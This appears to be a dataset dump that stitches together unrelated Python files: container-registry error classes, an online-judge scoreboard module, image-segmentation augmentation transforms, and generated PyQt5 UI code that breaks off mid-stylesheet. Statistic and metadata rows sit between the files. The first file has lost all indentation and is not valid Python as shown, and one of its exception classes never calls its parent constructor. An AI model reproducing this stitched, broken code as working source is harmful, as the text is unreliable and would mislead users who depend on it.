class V2RegistryException(Exception):
def __init__(
self,
error_code_str,
message,
detail,
http_status_code=400,
repository=None,
scopes=None,
is_read_only=False,
):
super(V2RegistryException, self).__init__(message)
self.http_status_code = http_status_code
self.repository = repository
self.scopes = scopes
self.is_read_only = is_read_only
self._error_code_str = error_code_str
self._detail = detail
def as_dict(self):
error_dict = {
"code": self._error_code_str,
"message": str(self),
"detail": self._detail if self._detail is not None else {},
}
if self.is_read_only:
error_dict["is_readonly"] = True
return error_dict
class BlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUnknown, self).__init__("BLOB_UNKNOWN", "blob unknown to registry", detail, 404)
class BlobUploadInvalid(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadInvalid, self).__init__(
"BLOB_UPLOAD_INVALID", "blob upload invalid", detail
)
class BlobUploadUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadUnknown, self).__init__(
"BLOB_UPLOAD_UNKNOWN", "blob upload unknown to registry", detail, 404
)
class DigestInvalid(V2RegistryException):
def __init__(self, detail=None):
super(DigestInvalid, self).__init__(
"DIGEST_INVALID", "provided digest did not match uploaded content", detail
)
class ManifestBlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestBlobUnknown, self).__init__(
"MANIFEST_BLOB_UNKNOWN", "manifest blob unknown to registry", detail
)
class ManifestInvalid(V2RegistryException):
def __init__(self, detail=None, http_status_code=400):
super(ManifestInvalid, self).__init__(
"MANIFEST_INVALID", "manifest invalid", detail, http_status_code
)
class ManifestUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnknown, self).__init__("MANIFEST_UNKNOWN", "manifest unknown", detail, 404)
class TagExpired(V2RegistryException):
def __init__(self, message=None, detail=None):
super(TagExpired, self).__init__("TAG_EXPIRED", message or "Tag has expired", detail, 404)
class ManifestUnverified(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnverified, self).__init__(
"MANIFEST_UNVERIFIED", "manifest failed signature verification", detail
)
class NameInvalid(V2RegistryException):
def __init__(self, detail=None, message=None):
super(NameInvalid, self).__init__(
"NAME_INVALID", message or "invalid repository name", detail
)
class NameUnknown(V2RegistryException):
def __init__(self, detail=None):
super(NameUnknown, self).__init__(
"NAME_UNKNOWN", "repository name not known to registry", detail, 404
)
class SizeInvalid(V2RegistryException):
def __init__(self, detail=None):
super(SizeInvalid, self).__init__(
"SIZE_INVALID", "provided length did not match content length", detail
)
class TagAlreadyExists(V2RegistryException):
def __init__(self, detail=None):
super(TagAlreadyExists, self).__init__(
"TAG_ALREADY_EXISTS", "tag was already pushed", detail, 409
)
class TagInvalid(V2RegistryException):
def __init__(self, detail=None):
super(TagInvalid, self).__init__("TAG_INVALID", "manifest tag did not match URI", detail)
class LayerTooLarge(V2RegistryException):
def __init__(self, uploaded=None, max_allowed=None):
detail = {}
message = "Uploaded blob is larger than allowed by this registry"
if uploaded is not None and max_allowed is not None:
detail = {
"reason": "%s is greater than maximum allowed size %s" % (uploaded, max_allowed),
"max_allowed": max_allowed,
"uploaded": uploaded,
}
up_str = bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")
max_str = bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")
message = "Uploaded blob of %s is larger than %s allowed by this registry" % (
up_str,
max_str,
)
class Unauthorized(V2RegistryException):
def __init__(self, detail=None, repository=None, scopes=None):
super(Unauthorized, self).__init__(
"UNAUTHORIZED",
"access to the requested resource is not authorized",
detail,
401,
repository=repository,
scopes=scopes,
)
class Unsupported(V2RegistryException):
def __init__(self, detail=None, message=None):
super(Unsupported, self).__init__(
"UNSUPPORTED", message or "The operation is unsupported.", detail, 405
)
class InvalidLogin(V2RegistryException):
def __init__(self, message=None):
super(InvalidLogin, self).__init__(
"UNAUTHORIZED", message or "Specified credentials are invalid", {}, 401
)
class InvalidRequest(V2RegistryException):
def __init__(self, message=None):
super(InvalidRequest, self).__init__(
"INVALID_REQUEST", message or "Invalid request", {}, 400
)
class NamespaceDisabled(V2RegistryException):
def __init__(self, message=None):
message = message or "This namespace is disabled. Please contact your system administrator."
super(NamespaceDisabled, self).__init__("DENIED", message, {}, 405)
class BlobDownloadGeoBlocked(V2RegistryException):
def __init__(self, detail=None):
message = (
"The region from which you are pulling has been geo-ip blocked. "
+ "Please contact the namespace owner."
)
super(BlobDownloadGeoBlocked, self).__init__("DENIED", message, detail, 403)
class ReadOnlyMode(V2RegistryException):
def __init__(self, detail=None):
message = (
"System is currently read-only. Pulls will succeed but all write operations "
+ "are currently suspended."
)
super(ReadOnlyMode, self).__init__("DENIED", message, detail, 405, is_read_only=True)
| 32.435644
| 100
| 0.654609
| 6,468
| 0.987179
| 0
| 0
| 0
| 0
| 0
| 0
| 1,425
| 0.217491
|
422f10e008ebbf5692ddbc20cb4464f21ab48808
| 3,956
|
py
|
Python
|
scoreboard.py
|
TheLurkingCat/scoreboard
|
9c292fc8573e7bf8539cb20a813c2147ddd0c923
|
[
"MIT"
] | null | null | null |
scoreboard.py
|
TheLurkingCat/scoreboard
|
9c292fc8573e7bf8539cb20a813c2147ddd0c923
|
[
"MIT"
] | null | null | null |
scoreboard.py
|
TheLurkingCat/scoreboard
|
9c292fc8573e7bf8539cb20a813c2147ddd0c923
|
[
"MIT"
] | null | null | null |
'''
LICENSE: MIT license
This module helps us know whom to ask when we run into
trouble with buggy code while solving problems.
'''
from asyncio import gather, get_event_loop
from pandas import DataFrame, set_option
from online_judge import Online_Judge
loop = get_event_loop()
set_option('display.max_colwidth', -1)
class Scoreboard:
'''Handles a dataframe to build up a scoreboard.
Attributes:
problems: (list) A list of problem id which we are tracking.
    scoreboard: (DataFrame) A pandas.DataFrame that stores user attempts,
        indexed by student id.
online_judge: (Online_Judge) An FOJ api wrapper.
'''
def __init__(self, token, problems, problem_name):
self.problems = problems
self.problem_name = problem_name
self.online_judge = Online_Judge(token)
self.scoreboard = DataFrame()
def update(self):
'''Update scoreboard using web crawler.
        Since the api returns a json message, we can use it to update the scoreboard.
'''
tasks = []
async def crawl(problem_id):
return await loop.run_in_executor(None, self.online_judge.get_submission, problem_id)
for problem_id in self.problems:
task = loop.create_task(crawl(problem_id))
tasks.append(task)
temp = dict(
zip(self.problems, loop.run_until_complete(gather(*tasks))))
self.scoreboard = DataFrame.from_dict(temp)
self.scoreboard.index.name = 'Student_ID'
self.scoreboard['Total'] = self.scoreboard.applymap(
lambda x: x == x and x['verdict'] == 10).sum(axis=1)
self.scoreboard['Penalty'] = self.scoreboard.applymap(
lambda x: x['penalty'] if isinstance(x, dict) and x['verdict'] == 10 else 0).sum(axis=1)
self.scoreboard.sort_values(
by=['Total', 'Penalty', 'Student_ID'], inplace=True, ascending=[False, True, True])
def visualize(self):
'''
Make scoreboard table.
Returns:
(str) A html page to be rendered.
'''
def make_verdict_string(x):
verdict = {4: 'CE', 5: 'RE', 6: 'MLE',
7: 'TLE', 8: 'OLE', 9: 'WA', 10: 'AC'}
if x == x:
return '<span class="{}" title="Attempted: {}">{}</span>'.format("right" if x['verdict'] == 10 else "wrong", x['penalty'], verdict[x['verdict']])
else:
return '<span class="none" title="Not Attempt">N/A</span>'
css = """<style type="text/css">
html,body{
margin:0;
padding:0;
height:100%;
width:100%;
}
.row_heading {width:70px}
.wrong {background-color:red}
.right {background-color:green}
.none {background-color:gray}
span{
text-align:center;
display:block;
width:60px;
}
th, td{
text-align:center;
width:60px;
}
a{
text-decoration:none;
color:black;
}
</style>
"""
scoreboard = self.scoreboard.drop(columns=['Total', 'Penalty']).applymap(
make_verdict_string)
scoreboard.index.name = None
scoreboard.index = scoreboard.index.map(
'<a href="https://oj.nctu.me/groups/11/submissions/?name={0}" target="_blank">{0}</a>'.format)
scoreboard.rename(lambda x: '<a href="https://oj.nctu.me/problems/{1}/" target="_blank" <span title="{0}">{1}</span></a>'.format(self.problem_name[str(x)], x),
axis='columns', inplace=True)
return css + scoreboard.to_html(border=0, max_cols=None, max_rows=None, escape=False)
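# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A minimal sketch of how the class above is meant to be driven: construct a Scoreboard,
# refresh it with update(), then write visualize() out as an HTML page. The token,
# problem ids and problem names below are placeholders, not real values.
if __name__ == '__main__':
    board = Scoreboard(token='<api-token>',
                       problems=['123', '456'],
                       problem_name={'123': 'A+B', '456': 'Knapsack'})
    board.update()
    with open('scoreboard.html', 'w', encoding='utf-8') as fp:
        fp.write(board.visualize())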
| 35.63964
| 167
| 0.548787
| 3,621
| 0.915319
| 0
| 0
| 0
| 0
| 126
| 0.03185
| 1,966
| 0.496967
|
422f98ebeb65b657f8b008da4345d8f0e09f42c7
| 10,406
|
py
|
Python
|
custom_transforms.py
|
zyxu1996/Efficient-Transformer
|
106347186d13e106e9129d25b72e2fd491c54452
|
[
"Apache-2.0"
] | 22
|
2021-10-13T05:10:15.000Z
|
2022-03-17T12:01:40.000Z
|
custom_transforms.py
|
zyXu1996/Efficient-Transformer
|
efd87d734d5835eccb5b624c5e7ca3a5a08f318b
|
[
"Apache-2.0"
] | null | null | null |
custom_transforms.py
|
zyXu1996/Efficient-Transformer
|
efd87d734d5835eccb5b624c5e7ca3a5a08f318b
|
[
"Apache-2.0"
] | 4
|
2021-11-08T10:30:23.000Z
|
2022-02-16T05:07:25.000Z
|
import torch
import random
import numpy as np
import cv2
import os
import torch.nn as nn
from torchvision import transforms
class RandomHorizontalFlip(object):
def __call__(self, sample):
image = sample['image']
label = sample['label']
if random.random() < 0.5:
image = cv2.flip(image, 1)
label = cv2.flip(label, 1)
return {'image': image, 'label': label}
class RandomVerticalFlip(object):
def __call__(self, sample):
image = sample['image']
label = sample['label']
if random.random() < 0.5:
image = cv2.flip(image, 0)
label = cv2.flip(label, 0)
return {'image': image, 'label': label}
class RandomScaleCrop(object):
def __init__(self, base_size=None, crop_size=None, fill=0):
"""shape [H, W]"""
if base_size is None:
base_size = [512, 512]
if crop_size is None:
crop_size = [512, 512]
self.base_size = np.array(base_size)
self.crop_size = np.array(crop_size)
self.fill = fill
def __call__(self, sample):
img = sample['image']
mask = sample['label']
# random scale (short edge)
short_size = random.choice([self.base_size * 0.5, self.base_size * 0.75, self.base_size,
self.base_size * 1.25, self.base_size * 1.5])
        short_size = short_size.astype(np.int64)  # np.int was removed from recent NumPy
h, w = img.shape[0:2]
if h > w:
ow = short_size[1]
oh = int(1.0 * h * ow / w)
else:
oh = short_size[0]
ow = int(1.0 * w * oh / h)
#img = img.resize((ow, oh), Image.BILINEAR)
#mask = mask.resize((ow, oh), Image.NEAREST)
img = cv2.resize(img, (ow, oh), interpolation=cv2.INTER_LINEAR)
mask = cv2.resize(mask, (ow, oh), interpolation=cv2.INTER_NEAREST)
# pad crop
if short_size[0] < self.crop_size[0] or short_size[1] < self.crop_size[1]:
padh = self.crop_size[0] - oh if oh < self.crop_size[0] else 0
padw = self.crop_size[1] - ow if ow < self.crop_size[1] else 0
#img = ImageOps.expand(img, border=(0, 0, padw, padh), fill=0)
#mask = ImageOps.expand(mask, border=(0, 0, padw, padh), fill=self.fill)
img = cv2.copyMakeBorder(img, 0, padh, 0, padw, borderType=cv2.BORDER_DEFAULT)
mask = cv2.copyMakeBorder(mask, 0, padh, 0, padw, borderType=cv2.BORDER_DEFAULT)
# random crop crop_size
h, w = img.shape[0:2]
x1 = random.randint(0, w - self.crop_size[1])
y1 = random.randint(0, h - self.crop_size[0])
img = img[y1:y1+self.crop_size[0], x1:x1+self.crop_size[1], :]
mask = mask[y1:y1+self.crop_size[0], x1:x1+self.crop_size[1]]
return {'image': img, 'label': mask}
class ImageSplit(nn.Module):
def __init__(self, numbers=None):
super(ImageSplit, self).__init__()
"""numbers [H, W]
split from left to right, top to bottom"""
if numbers is None:
numbers = [2, 2]
self.num = numbers
def forward(self, x):
flag = None
if len(x.shape) == 3:
x = x.unsqueeze(dim=1)
flag = 1
b, c, h, w = x.shape
num_h, num_w = self.num[0], self.num[1]
assert h % num_h == 0 and w % num_w == 0
split_h, split_w = h // num_h, w // num_w
outputs = []
outputss = []
for i in range(b):
for h_i in range(num_h):
for w_i in range(num_w):
output = x[i][:, split_h * h_i: split_h * (h_i + 1),
split_w * w_i: split_w * (w_i + 1)].unsqueeze(dim=0)
outputs.append(output)
outputs = torch.cat(outputs, dim=0).unsqueeze(dim=0)
outputss.append(outputs)
outputs = []
outputss = torch.cat(outputss, dim=0).contiguous()
if flag is not None:
outputss = outputss.squeeze(dim=2)
return outputss
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __init__(self, add_edge=True):
"""imagenet normalize"""
self.normalize = transforms.Normalize((.485, .456, .406), (.229, .224, .225))
self.add_edge = add_edge
def get_edge(self, img, edge_width=3):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (11, 11), 0)
edge = cv2.Canny(gray, 50, 150)
# cv2.imshow('edge', edge)
# cv2.waitKey(0)
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (edge_width, edge_width))
edge = cv2.dilate(edge, kernel)
edge = edge / 255
edge = torch.from_numpy(edge).unsqueeze(dim=0).float()
return edge
def __call__(self, sample):
# swap color axis because
# numpy image: H x W x C
# torch image: C X H X W
img = sample['image']
mask = sample['label']
mask = np.expand_dims(mask, axis=2)
img = np.array(img).astype(np.float32).transpose((2, 0, 1))
mask = np.array(mask).astype(np.int64).transpose((2, 0, 1))
img = torch.from_numpy(img).float().div(255)
img = self.normalize(img)
mask = torch.from_numpy(mask).float()
if self.add_edge:
edge = self.get_edge(sample['image'])
img = img + edge
return {'image': img, 'label': mask}
class RGBGrayExchange():
def __init__(self, path=None, palette=None):
self.palette = palette
"""RGB format"""
if palette is None:
self.palette = [[255, 255, 255], [0, 0, 255], [0, 255, 255],
[0, 255, 0], [255, 255, 0], [255, 0, 0]]
self.path = path
def read_img(self):
img = cv2.imread(self.path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3:
img = img[:, :, ::-1]
return img
def RGB_to_Gray(self, image=None):
if not self.path is None:
image = self.read_img()
Gray = np.zeros(shape=[image.shape[0], image.shape[1]], dtype=np.uint8)
for i in range(len(self.palette)):
index = image == np.array(self.palette[i])
index[..., 0][index[..., 1] == False] = False
index[..., 0][index[..., 2] == False] = False
Gray[index[..., 0]] = i
print('unique pixels:{}'.format(np.unique(Gray)))
return Gray
def Gray_to_RGB(self, image=None):
if not self.path is None:
image = self.read_img()
RGB = np.zeros(shape=[image.shape[0], image.shape[1], 3], dtype=np.uint8)
for i in range(len(self.palette)):
index = image == i
RGB[index] = np.array(self.palette[i])
print('unique pixels:{}'.format(np.unique(RGB)))
return RGB
class Mixup(nn.Module):
def __init__(self, alpha=1.0, use_edge=False):
super(Mixup, self).__init__()
self.alpha = alpha
self.use_edge = use_edge
def criterion(self, lam, outputs, targets_a, targets_b, criterion):
return lam * criterion(outputs, targets_a) + (1 - lam) * criterion(outputs, targets_b)
def forward(self, inputs, targets, criterion, model):
if self.alpha > 0:
lam = np.random.beta(self.alpha, self.alpha)
else:
lam = 1
batch_size = inputs.size(0)
index = torch.randperm(batch_size).cuda()
mix_inputs = lam*inputs + (1-lam)*inputs[index, :]
targets_a, targets_b = targets, targets[index]
outputs = model(mix_inputs)
losses = 0
if isinstance(outputs, (list, tuple)):
if self.use_edge:
for i in range(len(outputs) - 1):
loss = self.criterion(lam, outputs[i], targets_a, targets_b, criterion[0])
losses += loss
edge_targets_a = edge_contour(targets).long()
edge_targets_b = edge_targets_a[index]
loss2 = self.criterion(lam, outputs[-1], edge_targets_a, edge_targets_b, criterion[1])
losses += loss2
else:
for i in range(len(outputs)):
loss = self.criterion(lam, outputs[i], targets_a, targets_b, criterion)
losses += loss
else:
losses = self.criterion(lam, outputs, targets_a, targets_b, criterion)
return losses
def edge_contour(label, edge_width=3):
import cv2
cuda_type = label.is_cuda
    label = label.cpu().numpy().astype(np.int64)  # np.int was removed from recent NumPy
b, h, w = label.shape
edge = np.zeros(label.shape)
# right
edge_right = edge[:, 1:h, :]
edge_right[(label[:, 1:h, :] != label[:, :h - 1, :]) & (label[:, 1:h, :] != 255)
& (label[:, :h - 1, :] != 255)] = 1
# up
edge_up = edge[:, :, :w - 1]
edge_up[(label[:, :, :w - 1] != label[:, :, 1:w])
& (label[:, :, :w - 1] != 255)
& (label[:, :, 1:w] != 255)] = 1
# upright
edge_upright = edge[:, :h - 1, :w - 1]
edge_upright[(label[:, :h - 1, :w - 1] != label[:, 1:h, 1:w])
& (label[:, :h - 1, :w - 1] != 255)
& (label[:, 1:h, 1:w] != 255)] = 1
# bottomright
edge_bottomright = edge[:, :h - 1, 1:w]
edge_bottomright[(label[:, :h - 1, 1:w] != label[:, 1:h, :w - 1])
& (label[:, :h - 1, 1:w] != 255)
& (label[:, 1:h, :w - 1] != 255)] = 1
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (edge_width, edge_width))
for i in range(edge.shape[0]):
edge[i] = cv2.dilate(edge[i], kernel)
# edge[edge == 1] = 255 # view edge
# import random
# cv2.imwrite(os.path.join('./edge', '{}.png'.format(random.random())), edge[0])
if cuda_type:
edge = torch.from_numpy(edge).cuda()
else:
edge = torch.from_numpy(edge)
return edge
if __name__ == '__main__':
path = './data/vaihingen/annotations/labels'
filelist = os.listdir(path)
for file in filelist:
print(file)
img = cv2.imread(os.path.join(path, file), cv2.IMREAD_UNCHANGED)
img = torch.from_numpy(img).unsqueeze(dim=0).repeat(2, 1, 1)
img = edge_contour(img)
# cv2.imwrite(os.path.join(save_path, os.path.splitext(file)[0] + '.png'), gray)
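# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# The transform classes above all operate on a sample dict {'image': HxWx3 uint8 array,
# 'label': HxW array}, so they can be chained with torchvision's Compose. A minimal
# sketch under that assumption; `train_transform` is a hypothetical name:
#
#   train_transform = transforms.Compose([
#       RandomHorizontalFlip(),
#       RandomVerticalFlip(),
#       RandomScaleCrop(base_size=[512, 512], crop_size=[512, 512]),
#       ToTensor(add_edge=True),
#   ])
#   sample = {'image': np.zeros((512, 512, 3), np.uint8),
#             'label': np.zeros((512, 512), np.uint8)}
#   out = train_transform(sample)   # out['image'] is a 3x512x512 float tensor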
| 36.384615
| 106
| 0.540746
| 8,367
| 0.804055
| 0
| 0
| 0
| 0
| 0
| 0
| 1,016
| 0.097636
|
423075718e222b99f83bdb4ab73a14063da9d0ee
| 37,354
|
py
|
Python
|
ui/staff.py
|
AryaStarkSakura/Stylized-Neural-Painting
|
0502c9f12eb582fe2ebd0ffdc7008dc81cefa74c
|
[
"CC0-1.0"
] | null | null | null |
ui/staff.py
|
AryaStarkSakura/Stylized-Neural-Painting
|
0502c9f12eb582fe2ebd0ffdc7008dc81cefa74c
|
[
"CC0-1.0"
] | null | null | null |
ui/staff.py
|
AryaStarkSakura/Stylized-Neural-Painting
|
0502c9f12eb582fe2ebd0ffdc7008dc81cefa74c
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'staff.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
MainWindow.setStyleSheet("QListWidget, QListView, QTreeWidget, QTreeView,QFrame {\n"
" outline: 0px;\n"
"}\n"
"/*设置左侧选项的最小最大宽度,文字颜色和背景颜色*/\n"
"QListWidget {\n"
" min-width: 200px;\n"
" max-width: 200px;\n"
" color: white;\n"
" background-color:#2f4050\n"
"}\n"
"#head\n"
"{\n"
"background:white;\n"
"border-radius:30px;\n"
"}\n"
"#head_2\n"
"{\n"
"background:#CCFFCC;\n"
"border:1px solid;\n"
"border-color:#CCFFCC;\n"
"border-radius:60px;\n"
"}\n"
"#Search\n"
"{\n"
"border-radius:5px;\n"
"background:#293846;\n"
"border:0.5px solid;\n"
"border-color:white;\n"
"\n"
"}\n"
"QListWidget::item\n"
"{\n"
"height:60;\n"
"background-color:#293846;\n"
"}\n"
"#frame\n"
"{\n"
"background-color:#2f4050\n"
"\n"
"}\n"
"/*被选中时的背景颜色和左边框颜色*/\n"
"QListWidget::item:selected {\n"
" background: rgb(52, 52, 52);\n"
" border-left: 2px solid rgb(9, 187, 7);\n"
"}\n"
"/*鼠标悬停颜色*/\n"
"HistoryPanel::item:hover {\n"
" background: rgb(52, 52, 52);\n"
"}\n"
"/*右侧的层叠窗口的背景颜色*/\n"
"QStackedWidget {\n"
" background: white;\n"
"}\n"
"/*模拟的页面*/\n"
"#frame > QLabel\n"
"{\n"
"color:white;\n"
"}\n"
"#frame_2\n"
"{\n"
"background-color:#CCFFCC;\n"
"}\n"
"#page_2 > QLineEdit,QDateEdit\n"
"{\n"
"border-radius:5px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#6699CC;\n"
"}\n"
"#page_4 > QLineEdit\n"
"{\n"
"border-radius:5px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#6699CC;\n"
"}\n"
"QLineEdit\n"
"{\n"
"border-radius:5px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#6699CC;\n"
"}\n"
"\n"
"\n"
"")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.stackedWidget = QtWidgets.QStackedWidget(self.centralwidget)
self.stackedWidget.setGeometry(QtCore.QRect(190, 0, 611, 601))
self.stackedWidget.setStyleSheet("background-color:#FFFFFF\n"
"")
self.stackedWidget.setObjectName("stackedWidget")
self.page = QtWidgets.QWidget()
self.page.setObjectName("page")
self.split = QtWidgets.QFrame(self.page)
self.split.setGeometry(QtCore.QRect(10, 210, 600, 2))
self.split.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split.setFrameShape(QtWidgets.QFrame.HLine)
self.split.setFrameShadow(QtWidgets.QFrame.Raised)
self.split.setObjectName("split")
self.head_2 = QtWidgets.QToolButton(self.page)
self.head_2.setGeometry(QtCore.QRect(260, 30, 121, 121))
self.head_2.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("./pictures/staff3.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.head_2.setIcon(icon)
self.head_2.setIconSize(QtCore.QSize(100, 100))
self.head_2.setObjectName("head_2")
self.name = QtWidgets.QLabel(self.page)
self.name.setGeometry(QtCore.QRect(260, 160, 131, 31))
self.name.setAlignment(QtCore.Qt.AlignCenter)
self.name.setObjectName("name")
self.label = QtWidgets.QLabel(self.page)
self.label.setGeometry(QtCore.QRect(190, 240, 61, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_3 = QtWidgets.QLabel(self.page)
self.label_3.setGeometry(QtCore.QRect(190, 290, 51, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.page)
self.label_4.setGeometry(QtCore.QRect(190, 340, 71, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.page)
self.label_5.setGeometry(QtCore.QRect(190, 390, 61, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_5.setFont(font)
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.page)
self.label_6.setGeometry(QtCore.QRect(190, 440, 71, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.page)
self.label_7.setGeometry(QtCore.QRect(190, 490, 81, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.sname = QtWidgets.QLabel(self.page)
self.sname.setGeometry(QtCore.QRect(300, 250, 131, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sname.setFont(font)
self.sname.setObjectName("sname")
self.ssex = QtWidgets.QLabel(self.page)
self.ssex.setGeometry(QtCore.QRect(300, 300, 81, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.ssex.setFont(font)
self.ssex.setObjectName("ssex")
self.stime = QtWidgets.QLabel(self.page)
self.stime.setGeometry(QtCore.QRect(300, 350, 91, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.stime.setFont(font)
self.stime.setObjectName("stime")
self.srole = QtWidgets.QLabel(self.page)
self.srole.setGeometry(QtCore.QRect(300, 400, 81, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.srole.setFont(font)
self.srole.setObjectName("srole")
self.sphone = QtWidgets.QLabel(self.page)
self.sphone.setGeometry(QtCore.QRect(300, 450, 141, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sphone.setFont(font)
self.sphone.setObjectName("sphone")
self.sidcard = QtWidgets.QLabel(self.page)
self.sidcard.setGeometry(QtCore.QRect(300, 500, 181, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sidcard.setFont(font)
self.sidcard.setObjectName("sidcard")
self.label_8 = QtWidgets.QLabel(self.page)
self.label_8.setGeometry(QtCore.QRect(190, 540, 81, 51))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.label_8.setFont(font)
self.label_8.setObjectName("label_8")
self.sidcard_2 = QtWidgets.QLabel(self.page)
self.sidcard_2.setGeometry(QtCore.QRect(300, 550, 181, 31))
font = QtGui.QFont()
font.setFamily("幼圆")
font.setPointSize(10)
self.sidcard_2.setFont(font)
self.sidcard_2.setObjectName("sidcard_2")
self.stackedWidget.addWidget(self.page)
self.page_3 = QtWidgets.QWidget()
self.page_3.setObjectName("page_3")
self.searchTable = QtWidgets.QTableWidget(self.page_3)
self.searchTable.setGeometry(QtCore.QRect(0, 240, 611, 361))
self.searchTable.setStyleSheet("")
self.searchTable.setObjectName("searchTable")
self.searchTable.setColumnCount(9)
self.searchTable.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(6, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(7, item)
item = QtWidgets.QTableWidgetItem()
self.searchTable.setHorizontalHeaderItem(8, item)
self.frame_2 = QtWidgets.QFrame(self.page_3)
self.frame_2.setGeometry(QtCore.QRect(10, 30, 611, 211))
self.frame_2.setStyleSheet("background-color:rgb(255, 249, 246)")
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.searchName = QtWidgets.QLineEdit(self.frame_2)
self.searchName.setGeometry(QtCore.QRect(170, 40, 181, 41))
self.searchName.setStyleSheet("border-radius:10px;\n"
"background:#FFFFFF;\n"
"border:1px solid;\n"
"border-color:#CCCCFF;\n"
"")
self.searchName.setObjectName("searchName")
self.searchNB = QtWidgets.QToolButton(self.frame_2)
self.searchNB.setGeometry(QtCore.QRect(370, 40, 101, 41))
self.searchNB.setStyleSheet("background-color:rgb(255, 249, 246);\n"
"border:0px;\n"
"\n"
"border-radius:5px")
self.searchNB.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("./pictures/search.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.searchNB.setIcon(icon1)
self.searchNB.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.searchNB.setObjectName("searchNB")
self.label_74 = QtWidgets.QLabel(self.frame_2)
self.label_74.setGeometry(QtCore.QRect(310, 149, 151, 40))
self.label_74.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_74.setObjectName("label_74")
self.modifyvalue = QtWidgets.QLineEdit(self.frame_2)
self.modifyvalue.setGeometry(QtCore.QRect(430, 160, 111, 21))
self.modifyvalue.setStyleSheet("border-radius:5px")
self.modifyvalue.setText("")
self.modifyvalue.setObjectName("modifyvalue")
self.commitTableModify = QtWidgets.QPushButton(self.frame_2)
self.commitTableModify.setGeometry(QtCore.QRect(170, 155, 121, 31))
self.commitTableModify.setStyleSheet("#commitTableModify{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitTableModify:hover\n"
"{\n"
"background:#CCFF99\n"
"}")
self.commitTableModify.setObjectName("commitTableModify")
self.label_78 = QtWidgets.QLabel(self.frame_2)
self.label_78.setGeometry(QtCore.QRect(360, 10, 231, 21))
font = QtGui.QFont()
font.setPointSize(8)
self.label_78.setFont(font)
self.label_78.setObjectName("label_78")
self.commitTableDel = QtWidgets.QPushButton(self.frame_2)
self.commitTableDel.setGeometry(QtCore.QRect(170, 110, 121, 31))
self.commitTableDel.setStyleSheet("#commitTableDel{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitTableDel:hover\n"
"{\n"
